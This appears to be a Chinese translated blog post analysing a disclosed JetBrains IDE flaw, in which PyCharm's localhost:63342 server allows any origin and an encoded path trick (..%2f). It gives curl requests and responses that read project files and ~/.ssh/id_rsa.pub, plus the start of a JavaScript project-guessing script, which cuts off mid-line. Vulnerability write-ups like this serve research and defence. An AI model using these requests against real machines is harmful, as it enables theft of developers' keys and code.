JetBrains远程命令执行and信息泄露-一个POST请求沦陷开发人员机器

Home1.code小学生译文-JetBrains远程命令执行and信息泄露-一个POST请求沦陷开发人员机器 Updated 2016-08-30 10:45

小学生译文-JetBrains远程命令执行and信息泄露-一个POST请求沦陷开发人员机器

Table of Contents

0x00 前言

这个月的18号玄武实验室推送了一条信息,JetBrains IDE在15号被爆出一个存在了至少3年的漏洞.

今天看到todo.txt已经能堆满电脑屏幕了,准备清理一下.所以有了此文.

参考原文报告: http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/

这里我大概介绍一下,英文过关的话强烈推荐看原文.

0x01 简介

受影响的平台: windows、OS X

样本IDE: PyCharm, Android Studio, WebStorm, IntelliJ IDEA

样本下载:

Linux: https://download.jetbrains.com/python/pycharm-community-5.0.4.tar.gz OS X: https://download.jetbrains.com/python/pycharm-community-5.0.4.dmg Windows: https://download.jetbrains.com/python/pycharm-community-5.0.4.exe 0x02 初步发现

我的工作就是研究各种有意思的东西,哈哈哈,话说今天天气不错,会不会有一些好玩的服务悄悄跑起来?

lsof -P -iTCP | grep LISTEN ... pycharm 4177 user 289u IPv4 0x81a02fb90b4eef47 0t0 TCP localhost:63342 (LISTEN)

蛤?pycharm还开启了个服务? 63342是干嘛用的?

$ nmap -A -p 63342 127.0.0.1 # [...] PORT STATE SERVICE VERSION 63342/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port63342-TCP:V=6.46%I=7%D=8/2%Time=57A0DD64%P=x86_64-apple-darwin13.1. SF:0%r(GetRequest,173,"HTTP/1\.1\x20404\x20Not\x20Found\r\ncontent-type:\x # [...]

nmap说这可能是个http server, 以CORS标准伪造一个请求源,回显如下:

root@kali:~# curl -v -H "origin http://a.com" "http://127.0.0.1:63342" * Rebuilt URL to: http://127.0.0.1:63342/ * Trying 127.0.0.1... * Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0) > GET / HTTP/1.1 > Host: 127.0.0.1:63342 > User-Agent: curl/7.46.0 > Accept: */* > origin http://a.com > < HTTP/1.1 404 Not Found < content-type: text/html < content-length: 162 < server: PyCharm Community Edition 5.0.4 < date: Sun, 28 Aug 2016 19:55:39 GMT < access-control-allow-origin: //a.com < vary: origin < access-control-allow-credentials: true < access-control-allow-headers: content-type < access-control-allow-headers: accept < access-control-allow-headers: origin < access-control-allow-headers: authorization < * Connection #0 to host 127.0.0.1 left intact <!doctype html><title>404 Not Found</title><h1 style="text-align: center">404 Not Found</h1><hr/><p style="text-align: center">PyCharm Community Edition 5.0.4</p>root@kali:~#

从access-control-xxx得知允许任意来源的请求,那么我们能从它上面获得一些敏感信息吗?

0x03 项目文件读取

我发现这个http server跟WebStrom有关,WebStorm提供这个功能的初衷是让你不需要设置webserver就可以在浏览器中预览相关代码,

要触发它只需要单击"view in browser"按钮,相当于你在浏览器中访问 http://localhost:63342/<projectname>/<your_file.html>

我们来测试一下,在pycharm中创建一个项目,名为pycharmTest,并在该项目下创建一个名为test.txt的文件.

root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/test.txt" * Trying 127.0.0.1... * Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0) > GET /pycharmTest/test.txt HTTP/1.1 > Host: 127.0.0.1:63342 > User-Agent: curl/7.46.0 > Accept: */* > < HTTP/1.1 200 OK < content-type: text/plain < server: PyCharm Community Edition 5.0.4 < date: Sun, 28 Aug 2016 20:24:51 GMT < cache-control: private, must-revalidate < last-modified: Sun, 28 Aug 2016 20:24:37 GMT < content-length: 12 < * Connection #0 to host 127.0.0.1 left intact just for fun

那么,就是说,我们只需要猜测出项目名和文件名,在任意站点上部署这样一段代码:

欺骗目标访问就能读取相关文件的源码了,看起来好像比较难利用

肯定有人要说啦(其实并没有...) :

0x04 跨目录读取

诸君都知道有一些敏感信息存在固定位置,像.ssh/id_rsa,/etc/passwd等,我们可以用../ or ..\来进行上层目录的访问

但是直接请求../回显如下:

root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/../.ssh/id_rsa.pub " * Rebuilt URL to: http://127.0.0.1:63342/.ssh/id_rsa.pub * Trying 127.0.0.1... * Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0) > GET /.ssh/id_rsa.pub HTTP/1.1 > Host: 127.0.0.1:63342 > User-Agent: curl/7.46.0 > Accept: */* > < HTTP/1.1 404 Not Found < content-type: text/html < content-length: 162 < server: PyCharm Community Edition 5.0.4 < date: Sun, 28 Aug 2016 20:51:03 GMT < * Connection #0 to host 127.0.0.1 left intact <!doctype html><title>404 Not Found</title><h1 style="text-align: center">404 Not Found</h1><hr/><p style="text-align: center">PyCharm Community Edition 5.0.4</p>r

研究发现 RFC 3986 对路径进行了规范化,幸运的是pycharm内置的http server并没有对url编码过的/进行处理.

so:

root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/..%2f.ssh/id_rsa.pub " * Trying 127.0.0.1... * Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0) > GET /pycharmTest/..%2f.ssh/id_rsa.pub HTTP/1.1 > Host: 127.0.0.1:63342 > User-Agent: curl/7.46.0 > Accept: */* > < HTTP/1.1 200 OK < content-type: application/octet-stream < server: PyCharm Community Edition 5.0.4 < date: Sun, 28 Aug 2016 20:50:47 GMT < cache-control: private, must-revalidate < last-modified: Tue, 26 Jul 2016 12:20:12 GMT < content-length: 391 < ssh-rsa AAAA.... * Connection #0 to host 127.0.0.1 left intact

nice!

唯一的不足是还需要知道目标机器上的项目名才能获取到敏感信息,否则只会返回404.

猜测项目名时还需要一个一定存在的文件,不过这不难找,在JetBrains创建项目后,会生成 .idea/workspace.xml .

那么不难写出这样的目录探测脚本:

function findLoadedProject(cb) { var xhr = new XMLHttpRequest(); // Let's assume we have a sensible dictionary here. var possibleProjectNames = ["foobar", "testing", "bazquux"]; var tr

JetBrains远程命令执行and信息泄露-一个POST请求沦陷开发人员机器

Trending Articles

[奇怪机翻组] 双梦相牵 / ふたりの夢もち [RJ01259078] [WebRip] [1080P HEVC-10Bit AAC 2.0]...

HONDA CITY VTI-S 菜單分享

#新闻拍一拍# 新的摩尔定律：黄氏定律

一如既往的痴情能否打动月瓶金蝎？ (豆瓣月亮水瓶小组)

求購按摩椅~'~

「粉红」不是霸凌辜莞允杠部落客：我爽在哪？

Intel 7-10代集成显卡驱动31.0.101.2137完整版

涉Gotbit加密货币市场操纵台男纽约被捕

臺灣法治會計學會2025年第三季研討會

不靠姊姊！張柏芝弟弟開計程車維生

关门一家亲：习远平、张澜澜、徐才厚

剑指offer——24.二叉树中和为某一值的路径

苏珊米勒日晕05.11｜狮子鼓励孩子；处女相信自己 (豆瓣 SUSAN MILLER小组)

【台積電IT卓越新戰略5】台積IT組織5年三次大調整，要靠平臺工程讓DevOps創新再加速

【日语无字】春之钟.Haru.no.kane.1985.JAP.vhsrip.NoSub.by.xiongzaixia&vivi

美籍老公不讓步李愛綺兒子念公立小學

爆杨兰兰对于朦胧一见倾心泄露亲爹习近平致命机密？【阿波罗网报道】

湖州师范学院音乐学院开发的 Kontakt 8 明代魏氏乐琵琶/瑟/月琴音源即将发布

LameXP 4.21.2382 免安裝中文版 - MP3音樂轉檔軟體

免费翻墙节点大全